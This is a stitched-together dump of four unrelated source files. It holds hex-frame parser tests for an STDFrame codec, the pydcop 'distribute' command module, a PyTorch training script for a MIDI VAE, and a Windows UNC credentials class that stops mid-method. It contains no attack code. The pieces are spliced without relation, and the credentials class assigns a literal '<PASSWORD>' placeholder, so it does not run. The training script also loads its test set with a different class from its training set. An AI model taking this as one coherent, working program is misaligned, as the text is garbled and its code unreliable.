WTCParseBuildTest(STDFrame, "1100000f0401")
WTCParseBuildTest(STDFrame, "1101000f040100210000")
WTCParseBuildTest(STDFrame, "1105000f0401210000")
WTCParseBuildTest(STDFrame, "1100000f0100")
WTCParseBuildTest(STDFrame, "1101000f0100002303010002")
WTCParseBuildTest(STDFrame, "110000500004")
WTCParseBuildTest(STDFrame, "110a0050000641050100000100",ERR_SYM_EXP=True)
WTCParseBuildTest(STDFrame, "110a005000064103010000")
WTCParseBuildTest(STDFrame, "110a00500006410501040DAC04")
WTCParseBuildTest(STDFrame, "118a00500006410501040DAC0400")
WTCParseBuildTest(STDFrame, "1106005000000641000100100501010DAC01")
WTCParseBuildTest(STDFrame, "1107005081000006")
WTCParseBuildTest(STDFrame, "11080050000006")
WTCParseBuildTest(STDFrame, "1109005081000006")
WTCParseBuildTest(STDFrame, "110000500006")
WTCParseBuildTest(STDFrame, "1101005000060041050101000001")
WTCParseBuildTest(STDFrame, "110a80080000290001")
WTCParseBuildTest(STDFrame, "1106800800000029000101001111")
WTCParseBuildTest(STDFrame, "1107800880000000")
WTCParseBuildTest(STDFrame, "11088008000000")
WTCParseBuildTest(STDFrame, "110980080000000029001001001111")
WTCParseBuildTest(STDFrame, "110080080000")
WTCParseBuildTest(STDFrame, "11018008000000291111")
WTCParseBuildTest(STDFrame, "110080080002")
WTCParseBuildTest(STDFrame, "11018008000200291111")
WTCParseBuildTest(STDFrame, "110080080003")
WTCParseBuildTest(STDFrame, "110180080003002312121212")
WTCParseBuildTest(STDFrame, "1105800800032312121212")
WTCParseBuildTest(STDFrame, "110080080004")
WTCParseBuildTest(STDFrame, "11018008000400211111")
WTCParseBuildTest(STDFrame, "110580080004211111")
WTCParseBuildTest(STDFrame, "110080080005")
WTCParseBuildTest(STDFrame, "11018008000500211111")
WTCParseBuildTest(STDFrame, "110580080005211111")
WTCParseBuildTest(STDFrame, "110080080006")
WTCParseBuildTest(STDFrame, "110180080006002311111111")
WTCParseBuildTest(STDFrame, "1105800800062311111111")
WTCParseBuildTest(STDFrame, "110a80080100291111")
WTCParseBuildTest(STDFrame, "1106800800010029000100101111")
WTCParseBuildTest(STDFrame, "1107800881000100")
WTCParseBuildTest(STDFrame, "11088008000100")
WTCParseBuildTest(STDFrame, "110980080000010029000100101111")
WTCParseBuildTest(STDFrame, "110080080100")
WTCParseBuildTest(STDFrame, "11018008010000291111")
WTCParseBuildTest(STDFrame, "110a80080101291111")
WTCParseBuildTest(STDFrame, "1106800800010129000101101111")
WTCParseBuildTest(STDFrame, "1107800880000101")
WTCParseBuildTest(STDFrame, "11088008000101")
WTCParseBuildTest(STDFrame, "1109800880000101")
WTCParseBuildTest(STDFrame, "110080080101")
WTCParseBuildTest(STDFrame, "11018008010100291111")
WTCParseBuildTest(STDFrame, "110a80080102291111")
WTCParseBuildTest(STDFrame, "1106800800010229000110001111")
WTCParseBuildTest(STDFrame, "1107800880000102")
WTCParseBuildTest(STDFrame, "11088008000102")
WTCParseBuildTest(STDFrame, "1109800882000102")
WTCParseBuildTest(STDFrame, "110080080102")
WTCParseBuildTest(STDFrame, "11018008010200291111")
WTCParseBuildTest(STDFrame, "110080040000")
WTCParseBuildTest(STDFrame, "110180040000000811")
WTCParseBuildTest(STDFrame, "1105800400000801")
WTCParseBuildTest(STDFrame, "110080040001")
WTCParseBuildTest(STDFrame, "110180040001002012")
WTCParseBuildTest(STDFrame, "1105800400012011")
WTCParseBuildTest(STDFrame, "110080040002")
WTCParseBuildTest(STDFrame, "11018004000200410400011111")
WTCParseBuildTest(STDFrame, "110580040002410411110000")
WTCParseBuildTest(STDFrame, "1101800400030041020011")
WTCParseBuildTest(STDFrame, "11058004000341020011")
WTCParseBuildTest(STDFrame, "110080040004")
WTCParseBuildTest(STDFrame, "11018004000400410411111111")
WTCParseBuildTest(STDFrame, "110580040004410411111111")
WTCParseBuildTest(STDFrame, "110080040005")
WTCParseBuildTest(STDFrame, "1101800400050041081212121212121212")
WTCParseBuildTest(STDFrame, "1105800400054108",ERR_PARSE_EXP=True)
WTCParseBuildTest(STDFrame, "1107800580000000")
WTCParseBuildTest(STDFrame, "11088005000000")
WTCParseBuildTest(STDFrame, "110080050000")
WTCParseBuildTest(STDFrame, "110a001300552011")
WTCParseBuildTest(STDFrame, "11060013000055200001100011")
WTCParseBuildTest(STDFrame, "1107001380000055")
WTCParseBuildTest(STDFrame, "110a04050000211111")
WTCParseBuildTest(STDFrame, "1106040500000021000110001111")
WTCParseBuildTest(STDFrame, "1107040581000000")
WTCParseBuildTest(STDFrame, "11080405000000")
WTCParseBuildTest(STDFrame, "110904050000000021000110001111")
WTCParseBuildTest(STDFrame, "11080013000055")
WTCParseBuildTest(STDFrame, "1109001300000055200001100001")
WTCParseBuildTest(STDFrame, "110000130055")
WTCParseBuildTest(STDFrame, "110100130055002011")
WTCParseBuildTest(STDFrame, "1105001300552011")
WTCParseBuildTest(STDFrame, "11000013004a")
WTCParseBuildTest(STDFrame, "11010013004a002011")
WTCParseBuildTest(STDFrame, "11050013004a2011")
WTCParseBuildTest(STDFrame, "110000130100")
WTCParseBuildTest(STDFrame, "11010013010000230effffff")
WTCParseBuildTest(STDFrame, "110a000600001000")
WTCParseBuildTest(STDFrame, "11060006000000100001110001")
WTCParseBuildTest(STDFrame, "1107000682000000")
WTCParseBuildTest(STDFrame, "11080006000000")
WTCParseBuildTest(STDFrame, "1109000680000000")
WTCParseBuildTest(STDFrame, "110000060000")
WTCParseBuildTest(STDFrame, "110100060000001000")
WTCParseBuildTest(STDFrame, "110004050000")
WTCParseBuildTest(STDFrame, "11010405000000211111")
WTCParseBuildTest(STDFrame, "110004050001")
WTCParseBuildTest(STDFrame, "110004050002")
WTCParseBuildTest(STDFrame, "11010405000200211111")
WTCParseBuildTest(STDFrame, "110a800300001801")
WTCParseBuildTest(STDFrame, "11068003000000180001800A11")
WTCParseBuildTest(STDFrame, "1107800382000000")
WTCParseBuildTest(STDFrame, "11088003000000")
WTCParseBuildTest(STDFrame, "1109800381000000")
WTCParseBuildTest(STDFrame, "110080030000")
WTCParseBuildTest(STDFrame, "110180030000001810")
WTCParseBuildTest(STDFrame, "110080030001")
WTCParseBuildTest(STDFrame, "110180030001004106001001001000")
WTCParseBuildTest(STDFrame, "1105800300014106001001001000")
WTCParseBuildTest(STDFrame, "110080030002")
WTCParseBuildTest(STDFrame, "110080030003")
WTCParseBuildTest(STDFrame, "11018003000300211111")
WTCParseBuildTest(STDFrame, "110080030004")
WTCParseBuildTest(STDFrame, "110180030004002854")
WTCParseBuildTest(STDFrame, "110080030005")
WTCParseBuildTest(STDFrame, "110180030005002801")
WTCParseBuildTest(STDFrame, "110080030006")
WTCParseBuildTest(STDFrame, "1101800300060041050101000100")
WTCParseBuildTest(STDFrame, "110080060000")
WTCParseBuildTest(STDFrame, "1101800600000022002580")
WTCParseBuildTest(STDFrame, "1105800600002201C200")
WTCParseBuildTest(STDFrame, "110080060001")
WTCParseBuildTest(STDFrame, "110180060001002010")
WTCParseBuildTest(STDFrame, "1105800600012011")
WTCParseBuildTest(STDFrame, "110080060002")
WTCParseBuildTest(STDFrame, "110180060002002011")
WTCParseBuildTest(STDFrame, "11058006000220",ERR_PARSE_EXP=True)
WTCParseBuildTest(STDFrame, "110080060003")
WTCParseBuildTest(STDFrame, "1105800600032000")
WTCParseBuildTest(STDFrame, "110080070000")
WTCParseBuildTest(STDFrame, "1106800700000141000110000111")
WTCParseBuildTest(STDFrame, "1107800780000001")
WTCParseBuildTest(STDFrame, "11088007000001")
WTCParseBuildTest(STDFrame, "1109800700000001410001000A0101")
WTCParseBuildTest(STDFrame, "110080070001")
WTCParseBuildTest(STDFrame, "110080070002")
WTCParseBuildTest(STDFrame, "110180070002002011")
WTCParseBuildTest(STDFrame, "110a00520000410c111111000000111100002112")
WTCParseBuildTest(STDFrame, "1106005200000041011010000c000100111111212100001111")
WTCParseBuildTest(STDFrame, "1107005280000000")
WTCParseBuildTest(STDFrame, "11080052000000")
WTCParseBuildTest(STDFrame, "1109005200000000410001000A0c000001000002000300040005")
WTCParseBuildTest(STDFrame, "110000520000")
WTCParseBuildTest(STDFrame, "11010052000000410c101010010101111100001111")
WTCParseBuildTest(STDFrame, "110a04020000291010")
WTCParseBuildTest(STDFrame, "1106040200000029000110001010")
WTCParseBuildTest(STDFrame, "1107040280000000")
WTCParseBuildTest(STDFrame, "11080402000000")
WTCParseBuildTest(STDFrame, "110004020000")
WTCParseBuildTest(STDFrame, "110904020000000029000110001111")
WTCParseBuildTest(STDFrame, "11010402000000290010")
WTCParseBuildTest(STDFrame, "110004020001")
WTCParseBuildTest(STDFrame, "11010402000100290010")
WTCParseBuildTest(STDFrame, "110004020002")
WTCParseBuildTest(STDFrame, "11010402000200291100")
WTCParseBuildTest(STDFrame, "110a800200002b10101010")
WTCParseBuildTest(STDFrame, "110680020000002b0001100011111111")
WTCParseBuildTest(STDFrame, "1107800280000000")
WTCParseBuildTest(STDFrame, "11088002000000")
WTCParseBuildTest(STDFrame, "11098002000000002b0001100011111111")
WTCParseBuildTest(STDFrame, "110080020000")
WTCParseBuildTest(STDFrame, "110180020000002b11111111")
WTCParseBuildTest(STDFrame, "1105800200002b11111111")
WTCParseBuildTest(STDFrame, "110080020001")
WTCParseBuildTest(STDFrame, "110180020001002011")
WTCParseBuildTest(STDFrame, "110a800200022811")
WTCParseBuildTest(STDFrame, "11068002000002280001100011")
WTCParseBuildTest(STDFrame, "1107800280000002")
WTCParseBuildTest(STDFrame, "11088002000002")
WTCParseBuildTest(STDFrame, "1109800200000002280001100011")
WTCParseBuildTest(STDFrame, "110080020002")
WTCParseBuildTest(STDFrame, "110180020002002811")
WTCParseBuildTest(STDFrame, "110a800200032801")
WTCParseBuildTest(STDFrame, "11068002000003280001100011")
WTCParseBuildTest(STDFrame, "1107800280000003")
WTCParseBuildTest(STDFrame, "1109800200000003280001100011")
WTCParseBuildTest(STDFrame, "110080020003")
WTCParseBuildTest(STDFrame, "110180020003002811")
WTCParseBuildTest(STDFrame, "110080080004")
WTCParseBuildTest(STDFrame, "110180020004002001")
WTCParseBuildTest(STDFrame, "110000000010")
WTCParseBuildTest(STDFrame, "1101000000030042023031")
WTCParseBuildTest(STDFrame, "110100000004004200")
WTCParseBuildTest(STDFrame, "1101000000050042023031")
WTCParseBuildTest(STDFrame, "110100500004004c00001100110000110000")
WTCParseBuildTest(STDFrame, "11060050150006020000803c0000006413")
WTCParseBuildTest(STDFrame, "1106000c1d0055000000803c3b449ba63c23d70a81")
WTCParseBuildTest(STDFrame, "3106000c1d0055000000803c000000000000000001")
WTCParseBuildTest(STDFrame, "1106000f110055000000803c010111")
WTCParseBuildTest(STDFrame, "1106000f110055000000803c000001")
WTCParseBuildTest(STDFrame, "1106000f1d0402000000803c000000000000000001")
WTCParseBuildTest(STDFrame, "11060400150000000000803c0000000a2b")
WTCParseBuildTest(STDFrame, "11060402900000290000803c480000")
WTCParseBuildTest(STDFrame, "11060402150000000000803c000003e802")
WTCParseBuildTest(STDFrame, "11060405800000210000803c100000000001")
WTCParseBuildTest(STDFrame, "11060405150000000000803c000000640a")
WTCParseBuildTest(STDFrame, "1106000f110055000000803c00011a")
WTCParseBuildTest(STDFrame, "11068008150000000000803c0000000001")
WTCParseBuildTest(STDFrame, "110080080006")
WTCParseBuildTest(STDFrame, "11068008150100000000803c000A000B01")
WTCParseBuildTest(STDFrame, "11068008150101000000803c000C000D01")
WTCParseBuildTest(STDFrame, "11068008150102000000803c000D000E01")
WTCParseBuildTest(STDFrame, "1100000f0054")
WTCParseBuildTest(STDFrame, "11060403150000000000803c0000000001")
WTCParseBuildTest(STDFrame, "11060400150000000000803c0000000001")
WTCParseConclude()
'''
# COMPILING NOT DIRECTLY WORKING ON OUR CODEC
# st=STDFrame.compile(filename="copyforinspection.py")
# print(st.parse(b"\x11\x00\x00\x50\x00\x04"))
print(STDFrame.benchmark(b"\x11\x00\x00\x50\x00\x04"))
''' |
# BSD-3-Clause License
#
# Copyright 2017 Orange
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# 3. Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
.. _pydcop_commands_distribute:
pydcop distribute
=================
``pydcop distribute`` distributes a the computations for a DCOP over a set
of agents.
Synopsis
--------
::
pydcop distribute --distribution <distribution_method>
[--cost <distribution_method_for cost>]
[--graph <graph_model>]
[--algo <dcop_algorithm>] <dcop-files>
Description
-----------
Distributes the computation used to solve a DCOP.
The distribution obtained is written in yaml on standard output. It can also be
written into a file by using the ``--output`` global option. The
output file can be used as an input for
several commands that accept a distribution (e.g.
:ref:`orchestrator<pydcop_commands_orchestrator>`,
:ref:`solve<pydcop_commands_solve>`,
:ref:`run<pydcop_commands_run>`)
See Also
--------
:ref:`concepts_graph` and
:ref:`concepts_distribution`
Options
-------
``--distribution <distribution_method>`` / ``-d <distribution_method>``
The distribution algorithm (``oneagent``, ``adhoc``, ``ilp_fgdp``, etc.,
see :ref:`concepts_distribution`).
``--cost <distribution_method_for_cost>``
A distribution method that can be used to evaluate the cost of a
distribution. If not given, defaults to ``<distribution_method>``. If the
distribution method does not define cost, a cost None will be returned in
the command output.
``--algo <dcop_algorithm>`` / ``-a <dcop_algorithm>``
The (optional) algorithm whose computations will be distributed. It is needed
when the distribution depends on the computation's characteristics (which
depend on the algorithm). For example when the distribution is based on
computations footprint of communication load, the dcop algorithm is needed.
``--graph <graph_model>`` / ``-g <graph_model>``
The (optional) computation graph model,
one of ``factor_graph``, ``pseudotree``, ``constraints_hypergraph``
(see. :ref:`concepts_graph`)
The set of computation to distribute depends on the graph model used to
represent the DCOP.
When the ``--algo`` option is used, it is not required as the graph model
can be deduced from the DCOP algorithm.
``<dcop-files>``
One or several paths to the files containing the dcop. If several paths are
given, their content is concatenated as used a the yaml definition for the
DCOP.
Examples
--------
Distributing a DCOP for dsa, hence modeled as a constraints graph,
using the ``ilp_compref`` distribution method::
pydcop distribute -d ilp_compref -a dsa \\
graph_coloring_10_4_15_0.1_capa_costs.yml
Distributing a DCOP modelled as a factor graph. The DCOP algorithm is not
required here as the ``oneagent`` distribution algorithm does not depends on
the computation's characteristics (as it simply assign one computation to each
agent)::
pydcop distribute --graph factor_graph \\
--dist oneagent graph_coloring1.yaml
The following command gives the same result. Here, we can deduce the required
graph model, as maxsum works on a factor graph::
pydcop distribute --algo maxsum \\
--dist oneagent graph_coloring1.yaml
Example output::
cost: 0
distribution:
a1: [v3]
a2: [diff_1_2]
a3: [diff_2_3]
a4: [v1]
a5: [v2]
inputs:
algo: null
dcop: [tests/instances/graph_coloring1.yaml]
dist_algo: oneagent
graph: factor_graph
"""
import logging
import os
import threading
import traceback
from importlib import import_module
import sys
import time
import yaml
from pydcop.algorithms import list_available_algorithms, load_algorithm_module
from pydcop.commands._utils import _error
from pydcop.dcop.yamldcop import load_dcop_from_file
from pydcop.distribution.objects import ImpossibleDistributionException
logger = logging.getLogger("pydcop.cli.distribute")
def set_parser(subparsers):
algorithms = list_available_algorithms()
parser = subparsers.add_parser("distribute", help="distribute a static dcop")
parser.set_defaults(func=run_cmd)
parser.set_defaults(on_timeout=on_timeout)
parser.add_argument(
"dcop_files", type=str, nargs="+", metavar="FILE", help="dcop file(s)"
)
parser.add_argument(
"-g",
"--graph",
required=False,
choices=["factor_graph", "pseudotree", "constraints_hypergraph"],
help="Graphical model for dcop computations.",
)
parser.add_argument(
"-d",
"--distribution",
choices=[
"oneagent",
"adhoc",
"ilp_fgdp",
"ilp_compref",
"heur_comhost",
"gh_secp_cgdp",
"gh_secp_fgdp",
"oilp_secp_fgdp",
"oilp_secp_cgdp",
"oilp_cgdp",
"gh_cgdp",
],
required=True,
help="Algorithm for distributing the computation " "graph.",
)
parser.add_argument(
"--cost",
choices=["ilp_compref", "oilp_secp_fgdp", "oilp_secp_cgdp", "oilp_cgdp"],
default=None,
help="algorithm for computing the cost of the " "distribution.",
)
parser.add_argument(
"-a",
"--algo",
choices=algorithms,
required=False,
help="Optional, only needed for "
"distribution methods that require "
"the memory footprint and "
"communication load for computations",
)
def run_cmd(args, timer=None, timeout=None):
logger.debug('dcop command "distribute" with arguments {} '.format(args))
dcop_yaml_files = args.dcop_files
logger.info("loading dcop from {}".format(dcop_yaml_files))
dcop = load_dcop_from_file(dcop_yaml_files)
dist_module = load_distribution_module(args.distribution)
if args.cost:
cost_module = load_distribution_module(args.cost)
elif hasattr(dist_module, "distribution_cost"):
cost_module = dist_module
else:
cost_module = None
algo_module, graph_module = None, None
if args.algo is not None:
algo_module = load_algo_module(args.algo)
if args.graph is not None:
graph_type = args.graph
graph_module = load_graph_module(args.graph)
# Check that the graph model and the algorithm are compatible:
if algo_module is not None and algo_module.GRAPH_TYPE != args.graph:
_error("Incompatible graph model and algorithm")
elif algo_module is not None:
graph_module = load_graph_module(algo_module.GRAPH_TYPE)
graph_type = algo_module.GRAPH_TYPE
else:
_error("You must pass at leat --graph or --algo option")
# Build factor-graph computation graph
logger.info("Building computation graph for dcop {}".format(dcop_yaml_files))
cg = graph_module.build_computation_graph(dcop)
logger.info("Distributing computation graph for dcop {}".format(dcop_yaml_files))
if algo_module is None:
computation_memory = None
communication_load = None
else:
computation_memory = algo_module.computation_memory
communication_load = algo_module.communication_load
try:
start_t = time.time()
distribution = dist_module.distribute(
cg,
dcop.agents.values(),
hints=dcop.dist_hints,
computation_memory=computation_memory,
communication_load=communication_load,
)
duration = time.time() - start_t
dist = distribution.mapping()
if timer:
timer.cancel()
if cost_module:
cost, comm, hosting = cost_module.distribution_cost(
distribution,
cg,
dcop.agents.values(),
computation_memory=computation_memory,
communication_load=communication_load,
)
else:
cost, comm, hosting = None, None, None
result = {
"inputs": {
"dist_algo": args.distribution,
"dcop": args.dcop_files,
"graph": graph_type,
"algo": args.algo,
"duration": duration,
},
"distribution": dist,
"cost": cost,
"communication_cost": comm,
"hosting_cost": hosting,
}
if args.output is not None:
with open(args.output, encoding="utf-8", mode="w") as fo:
fo.write(yaml.dump(result))
print(yaml.dump(result))
sys.exit(0)
except ImpossibleDistributionException as e:
if timer:
timer.cancel()
result = {"status": "FAIL", "error": str(e)}
print(yaml.dump(result))
sys.exit(2)
def on_timeout():
print("TIMEOUT when distributing")
logger.info("cli timeout when distributing")
for th in threading.enumerate():
print(th)
traceback.print_stack(sys._current_frames()[th.ident])
os._exit(2)
# sys.exit(2)
def load_distribution_module(dist):
dist_module = None
try:
dist_module = import_module("pydcop.distribution.{}".format(dist))
except ImportError as e:
_error("Could not find distribution method {}".format(dist), e)
return dist_module
def load_graph_module(graph):
graph_module = None
try:
graph_module = import_module("pydcop.computations_graph.{}".format(graph))
except ImportError as e:
_error("Could not find computation graph type: {}".format(graph), e)
return graph_module
def load_algo_module(algo):
algo_module = None
try:
algo_module = load_algorithm_module(algo)
except ImportError as e:
_error("Could not find dcop algorithm: {}".format(algo), e)
return algo_module
|
<reponame>MagiCzOOz/signallike-embedding<gh_stars>1-10
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Aug 31 13:33:35 2020
@author: prang
Usage:
train.py [-h | --help]
train.py [--version]
train.py [--gpu] [--gpudev GPUDEVICE] [--lr LR] [--maxiter MITER]
[--runname RNAME] [--inputrep REP] [--path P] [--bsize BSIZE]
[--nbframe NBFRAME] [--o OUT] [--save]
Options:
-h --help Show this helper
--version Show version and exit
--gpu Use GPU or not [default: False]
--gpudev GPUDEVICE Which GPU will be use [default: 0]
--lr LR Initial learning rate [default: 1e-4]
--maxiter MITER Maximum number of updates [default: 50]
--runname RNAME Set the name of the run for tensorboard [default: default_run]
--inputrep REP Set the representation which will be used as input [default: midilike]
--path P The path of the MIDI files folder (with a test and train folder) \
[default: /fast-1/mathieu/datasets/Chorales_Bach_Proper_with_all_transposition].
--bsize BSIZE Batch size [default: 16]
--nbframe NBFRAME Number of frames per bar [default: 16]
--o OUT Path of the output directory [default: None]
--save Save the models during the training or not [default: True]
"""
import torch
import representations as rep_classes
import models as m
from tensorboardX import SummaryWriter
from docopt import docopt
from tqdm import tqdm
import os
# Usefull functions
def increase_wkl(epoch, w_kl, input_rep):
if input_rep == "pianoroll":
if epoch < 150 and epoch > 0:
if epoch % 10 == 0:
w_kl += 1e-5
else :
if epoch % 10 == 0 :
w_kl += 1e-4
elif input_rep in ["midilike", "signallike"]:
if epoch % 10 == 0 and epoch > 0:
w_kl += 1e-8
elif input_rep == "midimono":
if epoch % 10 == 0 and epoch > 0:
w_kl += 1e-4
elif input_rep == "notetuple":
if epoch % 10 == 0 and epoch > 0:
w_kl += 1e-6
return w_kl
# Load arguments from the shell command with docopt
if __name__ == '__main__':
arguments = docopt(__doc__, version='symbolic_embeddings v1.0')
print(arguments)
if torch.cuda.is_available() and not arguments['--gpu']:
print("WARNING: You have a CUDA device, so you should probably run with --gpu")
# Set GPU device and backend
if arguments['--gpu']:
torch.backends.cudnn.benchmark = True
torch.cuda.set_device(int(arguments['--gpudev']))
# Set detect anomaly
torch.autograd.set_detect_anomaly(True)
# Parameters
train_path = arguments['--path'] + '/train'
test_path = arguments['--path'] + '/test'
batch_size = int(arguments['--bsize'])
nb_frame = int(arguments['--nbframe'])
if arguments['--o'] == 'None':
output_dr = os.getcwd() + '/output'
else :
output_dr = arguments['--o']
# load the dataset
if arguments['--inputrep']=="pianoroll":
dataset = rep_classes.Pianoroll(train_path, nbframe_per_bar=nb_frame)
testset = rep_classes.Pianoroll(test_path, nbframe_per_bar=nb_frame)
input_dim = 128
seq_length = nb_frame
elif arguments['--inputrep']=="midilike":
dataset = rep_classes.Midilike(train_path)
testset = rep_classes.Midilike(test_path)
input_dim = 1
elif arguments['--inputrep']=="midimono":
dataset = rep_classes.Midimono(train_path)
testset = rep_classes.Midimono(test_path)
input_dim = 1
elif arguments['--inputrep']=="signallike":
dataset = rep_classes.Signallike(train_path, nbframe_per_bar=nb_frame*2, mono=True)
testset = rep_classes.Signallike(test_path, nbframe_per_bar=nb_frame*2, mono=True)
input_dim = dataset.signal_size//64
elif arguments['--inputrep']=="notetuple":
dataset = rep_classes.Notetuple(train_path)
testset = rep_classes.NoteTupleRepresentation(test_path)
input_dim = 5
else :
raise NotImplementedError("Representation {} not implemented".format(arguments['--inputrep']))
# Init the dataloader
data_loader = torch.utils.data.DataLoader(dataset, batch_size=batch_size, num_workers=1,
pin_memory=True, shuffle=True, drop_last=True)
test_loader = torch.utils.data.DataLoader(testset, batch_size=batch_size, num_workers=1,
pin_memory=True, shuffle=True, drop_last=True)
# init writer for tensorboard
writer = SummaryWriter(output_dr + '/runs/' + arguments['--runname'])
# Model parameters
enc_hidden_size = 1024
cond_hidden_size = 1024
dec_hidden_size = 1024
cond_outdim = 512
num_layers_enc = 2
num_layers_dec = 2
num_subsequences = 4
latent_size = 256
if arguments['--inputrep'] in ['pianoroll', 'signallike']:
output_dim = input_dim
if arguments['--inputrep']=='pianoroll':
seq_length = 16
else :
seq_length = 64
elif arguments['--inputrep']=="midilike":
output_dim = len(dataset.vocabulary)
seq_length = 64
elif arguments['--inputrep']=="midimono":
output_dim = 130
seq_length = 16
elif arguments['--inputrep']=="notetuple":
output_dim = sum([len(v) for v in dataset.vocabs]) + 129
seq_length = 32
# Instanciate model
encoder = m.Encoder_RNN(input_dim, enc_hidden_size, latent_size, num_layers_enc)
decoder = m.Decoder_RNN_hierarchical(output_dim, latent_size, cond_hidden_size,
cond_outdim,dec_hidden_size, num_layers_dec,
num_subsequences, seq_length)
model = m.VAE(encoder, decoder, arguments['--inputrep'])
# Loss
if arguments['--inputrep'] in ['pianoroll', 'signallike']:
loss_fn = torch.nn.MSELoss(reduction='sum')
else :
loss_fn = torch.nn.CrossEntropyLoss(reduction='sum')
# Move to GPU
if arguments['--gpu']:
loss_fn = loss_fn.cuda()
model = model.cuda()
# Optimizer
optimizer = torch.optim.Adam(model.parameters(), lr=float(arguments['--lr']))
# Start training
loss_test_min_reconst = 10e6
w_kl = 0
for epoch in range(int(arguments['--maxiter'])):
print('epoch : ' + str(epoch))
#### Train ####
loss_mean = 0
kl_div_mean = 0
reconst_loss_mean = 0
nb_pass = 0
model.train()
for i, x in tqdm(enumerate(data_loader), total=len(dataset)//batch_size):
if arguments['--gpu']:
if arguments['--inputrep'] == "notetuple":
x[0] = x[0].cuda()
x[1] = x[1].cuda()
else :
x = x.cuda()
# training pass
loss, kl_div, reconst_loss = model.batch_pass(x, loss_fn, optimizer,
w_kl, dataset)
loss_mean += loss
kl_div_mean += kl_div
reconst_loss_mean += reconst_loss
nb_pass+=1
# Increase the kl weight
w_kl = increase_wkl(epoch, w_kl, arguments['--inputrep'])
#### Test ####
loss_mean_TEST = 0
kl_div_mean_TEST = 0
reconst_loss_mean_TEST = 0
nb_pass_TEST = 0
model.eval()
with torch.no_grad():
for i, x in tqdm(enumerate(test_loader), total=len(testset)//batch_size):
if arguments['--gpu']:
if arguments['--inputrep'] == "notetuple":
x[0] = x[0].cuda()
x[1] = x[1].cuda()
else :
x = x.cuda()
# testing pass
loss, kl_div, reconst_loss = model.batch_pass(x, loss_fn, optimizer,
w_kl, dataset, test=True)
loss_mean_TEST += loss
kl_div_mean_TEST += kl_div
reconst_loss_mean_TEST += reconst_loss
nb_pass_TEST += 1
#### Add to tensorboard ####
print("adding stuff to tensorboard")
both_loss = {}
both_loss['train'] = loss_mean/nb_pass
both_loss['test'] = loss_mean_TEST/nb_pass_TEST
writer.add_scalar('data/loss_mean', loss_mean/nb_pass, epoch)
writer.add_scalar('data/kl_div_mean', kl_div_mean/nb_pass, epoch)
writer.add_scalar('data/reconst_loss_mean', reconst_loss_mean/nb_pass, epoch)
writer.add_scalar('data/loss_mean_TEST', loss_mean_TEST/nb_pass_TEST, epoch)
writer.add_scalar('data/kl_div_mean_TEST', kl_div_mean_TEST/nb_pass_TEST, epoch)
writer.add_scalar('data/reconst_loss_mean_TEST', reconst_loss_mean_TEST/nb_pass_TEST, epoch)
writer.add_scalars('data/Losses', both_loss, epoch)
#### Save the model ####
if arguments['--save']:
if epoch > 50 and loss_mean_TEST < loss_test_min_reconst:
loss_test_min_reconst = loss_mean_TEST
torch.save(model.cpu().state_dict(),
output_dr + '/models/' + arguments['--runname'] + '_epoch_' + str(epoch+1) + '.pth')
if arguments['--gpu']:
model = model.cuda()
# End of the script, close the writer
writer.close()
|
"""
Class and functions for dealing with credentials in UNC connections on Windows.
"""
from win_unc.errors import InvalidUsernameError
from win_unc.cleaners import clean_username
from win_unc.validators import is_valid_username
class UncCredentials(object):
"""
Represents a set of credentials to be used with a UNC connection. Credentials include a
username and a password.
"""
def __init__(self, username=None, password=None):
r"""
Returns a new `UncCredentials` object. Both `username` and `password` are optional.
If neither are provided, the new object will mean that credentials are unnecessary.
`username` must be a string representing a Windows username (logon). Windows usernames
may include a domain prefix (i.e. "domain\username"). If `username` cannot be
construed as a valid Windows username, then this will raise an
`InvalidUsernameError`.
Note: UNC connections that require authentication will use the username of the
currently logged in Windows user unless specifically provided another
username.
Note: Providing `None` and `''` (the empty string) have very different meanings.
Usernames cannot be empty.
`password` must be a string representing a password.
Note: Providing `None` and `''` (the empty string) have very different meanings.
The empty string is a meaningful, legitimate password.
If only the first positional argument is provided and it is already an instance of the
`UncCredentials` class (either directly or by inheritance), this constructor will clone
it and create a new `UncCredentials` object with the same properties.
"""
if password is None and isinstance(username, self.__class__):
new_username = username._username
new_password = username._password
else:
new_username = username
new_password = password
cleaned_username = clean_username(new_username) if new_username is not None else None
if cleaned_username is None or is_valid_username(cleaned_username):
self._username = cleaned_username
self._password = <PASSWORD>
else:
raise InvalidUsernameError(new_username)
def get_username(self):
"""
Returns the username of this `UncCredentials` object or `None` if no username was provided.
"""
return self._username
def get_password(self):
"""
Returns the password of this `UncCredentials` object or `None` if no password was provided.
"""
return self._password
def is_empty(self):
"""
Returns `True` if this `UncCredentials` object does not contain any meaningful credentials.
"""
return self._username is None and self._password is None
def get_auth_string(self):
"""
Returns a standard representation of these credentials as a string. The string mimics
the HTTP Basic Authentication scheme.
"""
if self._password is not None:
return '{0}:{1}'.format(self._username or '', self._password)
elif self._username:
return self._username
else:
return ''
def __eq__(self, other):
if isinstance(other, self.__class__):
return (self._username == other._username and self._password == other._password)
else:
return False
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return hash(str(self))
def __repr__(self):
